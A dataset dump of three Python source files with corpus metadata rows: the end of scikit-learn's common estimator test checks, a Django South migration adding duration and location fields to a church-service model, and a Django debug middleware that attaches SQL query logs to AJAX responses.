n_classes = len(classes)
n_samples, n_features = X.shape
with warnings.catch_warnings(record=True):
classifier = Classifier()
if name in ['BernoulliNB', 'MultinomialNB']:
X -= X.min()
set_fast_parameters(classifier)
# raises error on malformed input for fit
assert_raises(ValueError, classifier.fit, X, y[:-1])
# fit
classifier.fit(X, y)
# with lists
classifier.fit(X.tolist(), y.tolist())
assert_true(hasattr(classifier, "classes_"))
y_pred = classifier.predict(X)
assert_equal(y_pred.shape, (n_samples,))
# training set performance
if name not in ['BernoulliNB', 'MultinomialNB']:
assert_greater(accuracy_score(y, y_pred), 0.85)
# raises error on malformed input for predict
assert_raises(ValueError, classifier.predict, X.T)
if hasattr(classifier, "decision_function"):
try:
# decision_function agrees with predict
decision = classifier.decision_function(X)
if n_classes is 2:
assert_equal(decision.shape, (n_samples,))
dec_pred = (decision.ravel() > 0).astype(np.int)
assert_array_equal(dec_pred, y_pred)
if (n_classes is 3
and not isinstance(classifier, BaseLibSVM)):
# 1on1 of LibSVM works differently
assert_equal(decision.shape, (n_samples, n_classes))
assert_array_equal(np.argmax(decision, axis=1), y_pred)
# raises error on malformed input
assert_raises(ValueError,
classifier.decision_function, X.T)
# raises error on malformed input for decision_function
assert_raises(ValueError,
classifier.decision_function, X.T)
except NotImplementedError:
pass
if hasattr(classifier, "predict_proba"):
# predict_proba agrees with predict
y_prob = classifier.predict_proba(X)
assert_equal(y_prob.shape, (n_samples, n_classes))
assert_array_equal(np.argmax(y_prob, axis=1), y_pred)
# check that probas for all classes sum to one
assert_array_almost_equal(np.sum(y_prob, axis=1),
np.ones(n_samples))
# raises error on malformed input
assert_raises(ValueError, classifier.predict_proba, X.T)
# raises error on malformed input for predict_proba
assert_raises(ValueError, classifier.predict_proba, X.T)
def check_estimators_unfitted(name, Estimator):
"""Check if NotFittedError is raised when calling predict and related
functions"""
# Common test for Regressors as well as Classifiers
X, y = _boston_subset()
with warnings.catch_warnings(record=True):
est = Estimator()
assert_raises(NotFittedError, est.predict, X)
if hasattr(est, 'predict'):
assert_raises(NotFittedError, est.predict, X)
if hasattr(est, 'decision_function'):
assert_raises(NotFittedError, est.decision_function, X)
if hasattr(est, 'predict_proba'):
assert_raises(NotFittedError, est.predict_proba, X)
if hasattr(est, 'predict_log_proba'):
assert_raises(NotFittedError, est.predict_log_proba, X)
def check_classifiers_input_shapes(name, Classifier):
iris = load_iris()
X, y = iris.data, iris.target
X, y = shuffle(X, y, random_state=1)
X = StandardScaler().fit_transform(X)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
set_random_state(classifier)
# fit
classifier.fit(X, y)
y_pred = classifier.predict(X)
set_random_state(classifier)
# Check that when a 2D y is given, a DataConversionWarning is
# raised
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always", DataConversionWarning)
classifier.fit(X, y[:, np.newaxis])
msg = "expected 1 DataConversionWarning, got: %s" % (
", ".join([str(w_x) for w_x in w]))
assert_equal(len(w), 1, msg)
assert_array_equal(y_pred, classifier.predict(X))
def check_classifiers_classes(name, Classifier):
X, y = make_blobs(n_samples=30, random_state=0, cluster_std=0.1)
X, y = shuffle(X, y, random_state=7)
X = StandardScaler().fit_transform(X)
# We need to make sure that we have non negative data, for things
# like NMF
X -= X.min() - .1
y_names = np.array(["one", "two", "three"])[y]
for y_names in [y_names, y_names.astype('O')]:
if name in ["LabelPropagation", "LabelSpreading"]:
# TODO some complication with -1 label
y_ = y
else:
y_ = y_names
classes = np.unique(y_)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
if name == 'BernoulliNB':
classifier.set_params(binarize=X.mean())
set_fast_parameters(classifier)
# fit
classifier.fit(X, y_)
y_pred = classifier.predict(X)
# training set performance
assert_array_equal(np.unique(y_), np.unique(y_pred))
if np.any(classifier.classes_ != classes):
print("Unexpected classes_ attribute for %r: "
"expected %s, got %s" %
(classifier, classes, classifier.classes_))
def check_classifiers_pickle(name, Classifier):
X, y = make_blobs(random_state=0)
X, y = shuffle(X, y, random_state=7)
X -= X.min()
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
# raises error on malformed input for fit
assert_raises(ValueError, classifier.fit, X, y[:-1])
# fit
classifier.fit(X, y)
y_pred = classifier.predict(X)
pickled_classifier = pickle.dumps(classifier)
unpickled_classifier = pickle.loads(pickled_classifier)
pickled_y_pred = unpickled_classifier.predict(X)
assert_array_almost_equal(pickled_y_pred, y_pred)
def check_regressors_int(name, Regressor):
X, _ = _boston_subset()
X = X[:50]
rnd = np.random.RandomState(0)
y = rnd.randint(3, size=X.shape[0])
y = multioutput_estimator_convert_y_2d(name, y)
if name == 'OrthogonalMatchingPursuitCV':
# FIXME: This test is unstable on Travis, see issue #3190.
check_skip_travis()
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
# separate estimators to control random seeds
regressor_1 = Regressor()
regressor_2 = Regressor()
set_fast_parameters(regressor_1)
set_fast_parameters(regressor_2)
set_random_state(regressor_1)
set_random_state(regressor_2)
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
# fit
regressor_1.fit(X, y_)
pred1 = regressor_1.predict(X)
regressor_2.fit(X, y_.astype(np.float))
pred2 = regressor_2.predict(X)
assert_array_almost_equal(pred1, pred2, 2, name)
def check_regressors_train(name, Regressor):
X, y = _boston_subset()
y = StandardScaler().fit_transform(y) # X is already scaled
y = multioutput_estimator_convert_y_2d(name, y)
if name == 'OrthogonalMatchingPursuitCV':
# FIXME: This test is unstable on Travis, see issue #3190.
check_skip_travis()
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
regressor = Regressor()
set_fast_parameters(regressor)
if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'):
# linear regressors need to set alpha, but not generalized CV ones
regressor.alpha = 0.01
# raises error on malformed input for fit
assert_raises(ValueError, regressor.fit, X, y[:-1])
# fit
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
set_random_state(regressor)
regressor.fit(X, y_)
regressor.fit(X.tolist(), y_.tolist())
regressor.predict(X)
# TODO: find out why PLS and CCA fail. RANSAC is random
# and furthermore assumes the presence of outliers, hence
# skipped
if name not in ('PLSCanonical', 'CCA', 'RANSACRegressor'):
assert_greater(regressor.score(X, y_), 0.5)
def check_regressors_pickle(name, Regressor):
X, y = _boston_subset()
y = StandardScaler().fit_transform(y) # X is already scaled
y = multioutput_estimator_convert_y_2d(name, y)
if name == 'OrthogonalMatchingPursuitCV':
# FIXME: This test is unstable on Travis, see issue #3190.
check_skip_travis()
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
regressor = Regressor()
set_fast_parameters(regressor)
if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'):
# linear regressors need to set alpha, but not generalized CV ones
regressor.alpha = 0.01
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
regressor.fit(X, y_)
y_pred = regressor.predict(X)
# store old predictions
pickled_regressor = pickle.dumps(regressor)
unpickled_regressor = pickle.loads(pickled_regressor)
pickled_y_pred = unpickled_regressor.predict(X)
assert_array_almost_equal(pickled_y_pred, y_pred)
def check_class_weight_classifiers(name, Classifier):
for n_centers in [2, 3]:
# create a very noisy dataset
X, y = make_blobs(centers=n_centers, random_state=0, cluster_std=20)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.5,
random_state=0)
n_centers = len(np.unique(y_train))
if n_centers == 2:
class_weight = {0: 1000, 1: 0.0001}
else:
class_weight = {0: 1000, 1: 0.0001, 2: 0.0001}
with warnings.catch_warnings(record=True):
classifier = Classifier(class_weight=class_weight)
if hasattr(classifier, "n_iter"):
classifier.set_params(n_iter=100)
set_random_state(classifier)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
assert_greater(np.mean(y_pred == 0), 0.9)
def check_class_weight_auto_classifiers(name, Classifier, X_train, y_train,
X_test, y_test, weights):
with warnings.catch_warnings(record=True):
classifier = Classifier()
if hasattr(classifier, "n_iter"):
classifier.set_params(n_iter=100)
set_random_state(classifier)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
classifier.set_params(class_weight='auto')
classifier.fit(X_train, y_train)
y_pred_auto = classifier.predict(X_test)
assert_greater(f1_score(y_test, y_pred_auto, average='weighted'),
f1_score(y_test, y_pred, average='weighted'))
def check_class_weight_auto_linear_classifier(name, Classifier):
"""Test class weights with non-contiguous class labels."""
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0],
[1.0, 1.0], [1.0, 0.0]])
y = [1, 1, 1, -1, -1]
with warnings.catch_warnings(record=True):
classifier = Classifier()
if hasattr(classifier, "n_iter"):
# This is a very small dataset, default n_iter are likely to prevent
# convergence
classifier.set_params(n_iter=1000)
set_random_state(classifier)
# Let the model compute the class frequencies
classifier.set_params(class_weight='auto')
coef_auto = classifier.fit(X, y).coef_.copy()
# Count each label occurrence to reweight manually
mean_weight = (1. / 3 + 1. / 2) / 2
class_weight = {
1: 1. / 3 / mean_weight,
-1: 1. / 2 / mean_weight,
}
classifier.set_params(class_weight=class_weight)
coef_manual = classifier.fit(X, y).coef_.copy()
assert_array_almost_equal(coef_auto, coef_manual)
def check_estimators_overwrite_params(name, Estimator):
X, y = make_blobs(random_state=0, n_samples=9)
y = multioutput_estimator_convert_y_2d(name, y)
# some want non-negative input
X -= X.min()
with warnings.catch_warnings(record=True):
# catch deprecation warnings
estimator = Estimator()
if name == 'MiniBatchDictLearning' or name == 'MiniBatchSparsePCA':
# FIXME
# for MiniBatchDictLearning and MiniBatchSparsePCA
estimator.batch_size = 1
set_fast_parameters(estimator)
set_random_state(estimator)
params = estimator.get_params()
estimator.fit(X, y)
new_params = estimator.get_params()
for k, v in params.items():
assert_false(np.any(new_params[k] != v),
"Estimator %s changes its parameter %s"
" from %s to %s during fit."
% (name, k, v, new_params[k]))
def check_cluster_overwrite_params(name, Clustering):
X, y = make_blobs(random_state=0, n_samples=9)
with warnings.catch_warnings(record=True):
# catch deprecation warnings
clustering = Clustering()
set_fast_parameters(clustering)
params = clustering.get_params()
clustering.fit(X)
new_params = clustering.get_params()
for k, v in params.items():
assert_false(np.any(new_params[k] != v),
"Estimator %s changes its parameter %s"
" from %s to %s during fit."
% (name, k, v, new_params[k]))
def check_sparsify_multiclass_classifier(name, Classifier):
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1],
[-1, -2], [2, 2], [-2, -2]])
y = [1, 1, 1, 2, 2, 2, 3, 3, 3]
est = Classifier()
est.fit(X, y)
pred_orig = est.predict(X)
# test sparsify with dense inputs
est.sparsify()
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
# pickle and unpickle with sparse coef_
est = pickle.loads(pickle.dumps(est))
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
def check_sparsify_binary_classifier(name, Estimator):
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
y = [1, 1, 1, 2, 2, 2]
est = Estimator()
est.fit(X, y)
pred_orig = est.predict(X)
# test sparsify with dense inputs
est.sparsify()
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
# pickle and unpickle with sparse coef_
est = pickle.loads(pickle.dumps(est))
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
def check_classifier_data_not_an_array(name, Estimator):
X = np.array([[3, 0], [0, 1], [0, 2], [1, 1], [1, 2], [2, 1]])
y = [1, 1, 1, 2, 2, 2]
y = multioutput_estimator_convert_y_2d(name, y)
check_estimators_data_not_an_array(name, Estimator, X, y)
def check_regressor_data_not_an_array(name, Estimator):
X, y = _boston_subset(n_samples=50)
y = multioutput_estimator_convert_y_2d(name, y)
check_estimators_data_not_an_array(name, Estimator, X, y)
def check_estimators_data_not_an_array(name, Estimator, X, y):
if name in CROSS_DECOMPOSITION:
raise SkipTest
# catch deprecation warnings
with warnings.catch_warnings(record=True):
# separate estimators to control random seeds
estimator_1 = Estimator()
estimator_2 = Estimator()
set_fast_parameters(estimator_1)
set_fast_parameters(estimator_2)
set_random_state(estimator_1)
set_random_state(estimator_2)
y_ = NotAnArray(np.asarray(y))
X_ = NotAnArray(np.asarray(X))
# fit
estimator_1.fit(X_, y_)
pred1 = estimator_1.predict(X_)
estimator_2.fit(X, y)
pred2 = estimator_2.predict(X)
assert_array_almost_equal(pred1, pred2, 2, name)
def check_parameters_default_constructible(name, Estimator):
classifier = LDA()
# test default-constructibility
# get rid of deprecation warnings
with warnings.catch_warnings(record=True):
if name in META_ESTIMATORS:
estimator = Estimator(classifier)
else:
estimator = Estimator()
# test cloning
clone(estimator)
# test __repr__
repr(estimator)
# test that set_params returns self
assert_true(isinstance(estimator.set_params(), Estimator))
# test if init does nothing but set parameters
# this is important for grid_search etc.
# We get the default parameters from init and then
# compare these against the actual values of the attributes.
# this comes from getattr. Gets rid of deprecation decorator.
init = getattr(estimator.__init__, 'deprecated_original',
estimator.__init__)
try:
args, varargs, kws, defaults = inspect.getargspec(init)
except TypeError:
# init is not a python function.
# true for mixins
return
params = estimator.get_params()
if name in META_ESTIMATORS:
# they need a non-default argument
args = args[2:]
else:
args = args[1:]
if args:
# non-empty list
assert_equal(len(args), len(defaults))
else:
return
for arg, default in zip(args, defaults):
if arg not in params.keys():
# deprecated parameter, not in get_params
assert_true(default is None)
continue
if isinstance(params[arg], np.ndarray):
assert_array_equal(params[arg], default)
else:
assert_equal(params[arg], default)
def multioutput_estimator_convert_y_2d(name, y):
# Estimators in mono_output_task_error raise ValueError if y is of 1-D
# Convert into a 2-D y for those estimators.
if name in (['MultiTaskElasticNetCV', 'MultiTaskLassoCV',
'MultiTaskLasso', 'MultiTaskElasticNet']):
return y[:, np.newaxis]
return y
def check_non_transformer_estimators_n_iter(name, estimator,
multi_output=False):
# Check if all iterative solvers, run for more than one iteratiom
iris = load_iris()
X, y_ = iris.data, iris.target
if multi_output:
y_ = y_[:, np.newaxis]
set_random_state(estimator, 0)
if name == 'AffinityPropagation':
estimator.fit(X)
else:
estimator.fit(X, y_)
assert_greater(estimator.n_iter_, 0)
def check_transformer_n_iter(name, estimator):
if name in CROSS_DECOMPOSITION:
# Check using default data
X = [[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [2., 5., 4.]]
y_ = [[0.1, -0.2], [0.9, 1.1], [0.1, -0.5], [0.3, -0.2]]
else:
X, y_ = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X -= X.min() - 0.1
set_random_state(estimator, 0)
estimator.fit(X, y_)
# These return a n_iter per component.
if name in CROSS_DECOMPOSITION:
for iter_ in estimator.n_iter_:
assert_greater(iter_, 1)
else:
assert_greater(estimator.n_iter_, 1)
| bsd-3-clause | -6,095,188,954,073,235,000 | 34.606262 | 79 | 0.604999 | false |
jammon/gemeinde | gottesdienste/migrations/0004_auto__add_field_gottesdienst_dauer__add_field_gottesdienst_ort.py | 1 | 2642 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Gottesdienst.dauer'
db.add_column(u'gottesdienste_gottesdienst', 'dauer',
self.gf('django.db.models.fields.IntegerField')(default=60),
keep_default=False)
# Adding field 'Gottesdienst.ort'
db.add_column(u'gottesdienste_gottesdienst', 'ort',
self.gf('django.db.models.fields.CharField')(default='', max_length=50, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Gottesdienst.dauer'
db.delete_column(u'gottesdienste_gottesdienst', 'dauer')
# Deleting field 'Gottesdienst.ort'
db.delete_column(u'gottesdienste_gottesdienst', 'ort')
models = {
u'gottesdienste.gottesdienst': {
'Meta': {'object_name': 'Gottesdienst'},
'datum': ('django.db.models.fields.DateTimeField', [], {}),
'dauer': ('django.db.models.fields.IntegerField', [], {'default': '60'}),
'freitext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'ort': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'prediger': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'prediger_key': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['gottesdienste.Prediger']", 'null': 'True', 'blank': 'True'}),
'predigttext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
},
u'gottesdienste.prediger': {
'Meta': {'object_name': 'Prediger'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nachname': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'vorname': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'})
}
}
complete_apps = ['gottesdienste'] | mit | 1,991,793,960,841,552,400 | 48.867925 | 154 | 0.571537 | false |
katharine-kinn/django-sql-debugger | sql_debugger/middleware.py | 1 | 1318 | import json
from django.db import connections, connection
from django.conf import settings
__all__ = ['SQLDebugMiddleware']
class SQLDebugMiddleware(object):
def process_response(self, request, response):
if not settings.DEBUG:
return response
if request.is_ajax():
if response.status_code / 100 == 2:
try:
resp_d = json.loads(response.content)
resp_d['path'] = request.get_full_path()
resp_d['sql_debug_info'] = connection.queries
response.content = json.dumps(resp_d)
except Exception, e:
pass
else:
parts = {
"traceback": "Traceback"
}
empty_line = '\n\n'
resp_parts = response.content.split(empty_line)
res = { "error": resp_parts[0] }
for rp in resp_parts:
for k,p in parts.iteritems():
if rp.startswith(p):
res[k] = rp
response.content = json.dumps(
{
"errordata": res, "path": request.get_full_path()
}
)
return response
| mit | 3,783,446,745,468,610,600 | 28.954545 | 73 | 0.455994 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.